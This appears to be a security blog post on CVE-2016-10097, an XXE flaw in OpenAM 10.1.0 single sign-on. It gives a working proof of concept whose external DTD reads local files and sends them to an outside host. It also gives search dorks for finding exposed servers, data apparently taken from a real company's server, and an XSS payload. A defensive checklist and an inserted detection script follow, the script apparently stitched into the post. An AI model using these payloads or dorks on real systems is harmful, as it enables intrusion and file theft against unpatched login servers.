CVE-2016-10097, XXE, SSO, Open AM 10.1.0, XML Injection, SAML Request Parameter

CVE-2016-10097 – See Also Indicators of Compromise

DORK: “Copyright © 2010 ForgeRock AS, Philip Pedersens vei 1, 1366 Lysaker, Norway”

XML External Entity (XXE) Vulnerability in /SSOPOST/metaAlias/%realm%/idpv2 in OpenAM – Access Management 10.1.0 allows remote attackers to read arbitrary files via the SAMLRequest parameter.

XXE Proof of Concept (PoC) Code for Exploit against Open AM 10.1.0 at the SAML Request Parameter via /SSOPOST/metaAlias/%realm%/idpv2

The Code for CVE-2016-10097
Figure: CVE-2016-10097, XML Injection, XXE, Open AM 10.1

<!DOCTYPE data SYSTEM "http://xss.cx/openam101.dtd"><data>&send;</data>

Contents of openam101.dtd:
<!ENTITY % file SYSTEM "file:///proc/meminfo">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://xss.cx/?%file;'>">
%all;

Results:
vmstat
cpu  419311965 4958 41906219 5571468847 1211462 8047 3780040 0 0
cpu0 103233830 1190 8362638 1396465878 301560 1975 552107 0 0
cpu1 102848677 1225 8610282 1397505613 324501 2071 519396 0 0
cpu2 111458378 1316 16816343 1378419372 283117 2061 2203759 0 0
cpu3 101771078 1225 8116954 1399077982 302283 1939 504776 0 0

ctxt 57268543587
btime 1443026641
processes 9102942
procs_running 1
procs_blocked 0
softirq 21376324649 0 1786417168 3049727 3740787123 46379118 0 4661 668387188

This POST is meant to highlight a DORK for XXE bugs in Open AM 10.1.0.

Open Source Software Exploits can often be identified via a well-crafted DORK: (1) inurl:SSOPOST or (2) "X-DSAME Version: Release 9.5.1 Build 9.5.1(2010-November-04 13:03)".

If you’re new to InfoSec, read the 2013 SlideShare and the 2012 USENIX PDF On Breaking SAML: Be Whoever You Want to Be.

Any SSO Provider using an old, out-of-date version of OPEN AM 10.1.0 has an Exploitable SSO based on a simple DORK Search. Sensitive Information is available via XXE!

Figure: OPEN AM Version 10.1.0 vulnerable to XXE
Figure: OPEN AM V10.1 DORK: "Copyright © 2010 ForgeRock AS, Philip Pedersens vei 1, 1366 Lysaker, Norway"

CV InfoSec Team – You had 1 Job

The SAMLRequest parameter is vulnerable to XML external entity injection at /SSOPOST/metaAlias/%realm%/idpv2

First Issue: Contents of /etc/issue – Red Hat Enterprise Linux Server release 6.6 (Santiago)

Comments: Best to look for a new job outside of InfoSec

Second Issue: Listing of /etc/motd – All activity on this system is subject to monitoring. If information collected reveals possible activity that exceeds privileges, evidence of such activity will be used for further action. By continuing past this point, you expressly consent to this monitoring.

Comments: No one is monitoring this VM or e-mail to security@

Third Issue: Contents of /tmp:
.ICE-unix
LogProcessor.out
atmail-reporting.log.20160315-0600858563343566468716.log
atmail-reporting.log.20160316-0600687904557808202862.log
clean_photos.out
hsperfdata_jboss
hsperfdata_root
log_rotate_jboss.log
lost+found
nestedjar2380369184215401439.tmp
nestedjar3404424855453741479.tmp

Contents of /tmp/LogProcessor.out
06:00:01 [WARN] – Using db.host: ora1tacap.srv.hcvlny.cv.net
06:00:01 [WARN] – Processing log file: /cust/apache/logs/atmail-reporting.log
06:00:01 [WARN] – Copying to temp file: /tmp/atmail-reporting.log.20160316-0600687904557808202862.log
06:00:01 [ERROR] – Could not read the reporting log
java.io.FileNotFoundException: /cust/apache/logs/atmail-reporting.log (No such file or directory)
at java.io.FileInputStream.open(Native Method)
at java.io.FileInputStream.<init>(FileInputStream.java:106)
at java.io.FileReader.<init>(FileReader.java:55)
at com.cablevision.mobilemail.io.FileProcessor$1.getInput(FileProcessor.java:62)
at com.cablevision.mobilemail.io.FileProcessor$1.getInput(FileProcessor.java:59)
at com.google.common.io.CharStreams.copy(CharStreams.java:154)
at com.cablevision.mobilemail.io.FileProcessor.processFile(FileProcessor.java:59)
at com.cablevision.mobilemail.io.Launcher.main(Launcher.java:66)
06:00:01 [WARN] – Wrote buffer: 0 in 93 millis
06:00:01 [WARN] – Completed.

Comments: Serving your /tmp Directory in response to an HTTP POST isn’t the desired outcome; you’re doing it all wrong.

Issue Four: Contents of /etc/shells
/bin/sh
/bin/bash
/sbin/nologin
/bin/dash
/bin/ksh
/bin/tcsh
/bin/csh

Comments: BASH is our favorite shell, but you probably didn’t expect your bash_history to be served over HTTP, did you?

Issue Five: You left all the default files available from the Install

DORK Search for /wizard/wizard.jsp
Figure: Open AM 10.1 Configuration Wizard
Figure: Exposed Open AM 10.1.0 found via DORK Search
Figure: OPEN AM Version 10.1.0 Default Admin Page at Installation

Comments: There is no Scanner that can perform proper XXE to get the Keys to the Kingdom automagically. XML Injection done properly is all manual. You’ll need to update SessionIDs, Cookies and other HTTP Headers. Within the SAML, the XML will contain URIs and custom resources that will need to be massaged by hand. Don’t push out a huge signature with a Scanner. Even if you get a Bite on XXE in Burp, you’ll need to sit down and do the Exploration and Harvesting by Hand with Burp Repeater and the Command Line; look at the pictures of what can be Harvested below.

XXE IoCs for InfoSec Teams

1. Is your Server Patched and Up To Date?

2. Are you watching Outbound Connections from the XML Parser?

  • Port 21, 22, 23, 80, 443, 8080, 8443?
  • Are there Established Connections from an XML Host?
  • Did you see /etc/passwd in the GET or POST?
    Figure: HTTP Logfiles showing an XXE GET containing /etc/passwd

3. Have you disabled External Entity Resolution?

  • Can an Attacker still reference URIs?
    • What about upgrade history Logs?
      Figure: Logfiles provide juicy details to identify RCE Endpoints, Server Version IDs and more.
      Figure: XXE Recon can provide clues to RCE Endpoints. Picture shows JBOSS Web Console recently installed.
    • Do you allow the XML Parser to Serve your ~root/.bash_history too?
      Figure: XXE test for ~root/.bash_history
      Figure: XXE Check for contents of ~root/.bash_history
  • Do you know which Directories an Attacker can Read and Exfiltrate via XXE?
    Figure: External Entity Injection can provide additional Pathways for an Attacker to find an RCE Endpoint
  • Can an Attacker abuse Protocol Handlers?
    • jar:// too?
    • How about those Windows Help Files?
    • Or find out where else you auth?
      Figure: Information Exposure via LDAP allows an Attacker to gain insight into your Ops
      Figure: .bash_history can provide additional clues to the Keys to the Kingdom

4. Have you sufficient Permissions on the XML Parser and its UID:GID?

  • To Prevent File System Scanning?
  • To Prevent LAN Scanning?
  • To prevent connecting to localhost?

5. Have you Programmatically disallowed DNS Lookups from your XML Parser?

  • By modifying the Source

6. Have you recently performed a Manual Engagement with an XML Parser that includes Fuzzing?
(If you’ve answered ‘NO’ to these Questions, it’s time to look for another Job)
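As an added example (not code from the original post), a small triage script for questions 2 and 3 above: it decodes SAMLRequest values as carried by the SAML POST binding and flags DTD or entity declarations and sensitive file paths, which a legitimate AuthnRequest never contains. The sample requests and the host attacker.example are constructed for the example.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, quote_plus

# A SAML AuthnRequest never needs a DTD or entity declaration; any of these is a red flag.
XXE_MARKERS = re.compile(r"<!DOCTYPE|<!ENTITY|\bSYSTEM\s+[\"']|%\w+;|file://", re.I)
# Paths from the checklist above that have no business in a request line or SAML payload.
SENSITIVE_PATHS = re.compile(r"/etc/(passwd|shadow|issue|motd|shells)|/proc/|\.bash_history")

def decode_samlrequest(value: str) -> str:
    """SAMLRequest in the POST binding is base64 XML; fall back to the raw text so a
    plain-XML submission (as in the PoC above) is still inspected."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return value

def scan_request(method: str, path: str, body: str) -> list:
    """Return the indicators found in one HTTP request (empty list = clean)."""
    findings = []
    if SENSITIVE_PATHS.search(path):
        findings.append("sensitive path in request line")
    if method == "POST" and "/SSOPOST/" in path:
        for value in parse_qs(body).get("SAMLRequest", []):   # parse_qs URL-decodes
            xml = decode_samlrequest(value)
            if XXE_MARKERS.search(xml):
                findings.append("DTD/entity declaration in SAMLRequest")
            if SENSITIVE_PATHS.search(xml):
                findings.append("sensitive path in SAMLRequest")
    return findings

# Constructed sample traffic (not from the original post): a benign AuthnRequest,
# a base64 SAMLRequest carrying an external DTD reference, the same payload sent
# as raw XML, and a GET probing for /etc/passwd.
BENIGN_XML = ('<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
              'ID="_abc123" Version="2.0" IssueInstant="2016-03-16T06:00:01Z"/>')
XXE_XML = '<!DOCTYPE data SYSTEM "http://attacker.example/evil.dtd"><data>&send;</data>'
IDP = "/SSOPOST/metaAlias/realm/idpv2"   # %realm% from the post replaced by a placeholder
SAMPLE_REQUESTS = [
    ("POST", IDP, "SAMLRequest=" + quote_plus(base64.b64encode(BENIGN_XML.encode()).decode())),
    ("POST", IDP, "SAMLRequest=" + quote_plus(base64.b64encode(XXE_XML.encode()).decode())),
    ("POST", IDP, "SAMLRequest=" + quote_plus(XXE_XML)),
    ("GET", "/?file:///etc/passwd", ""),
]
```

Run scan_request over each tuple in SAMPLE_REQUESTS (or over your own parsed access-log records); only the benign AuthnRequest returns an empty list.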

That’s all for today folks!

MS16-035 made Breaking Changes:
External references disabled by default
XPath Transform disabled by default
XSLT Transform disabled by default

Resources:
Open AM V. 10.1 Directory Tree
.NET Signed XML Vulnerability

POST-XSS PoC:
SAMLRequest=<script>confirm(1)</script>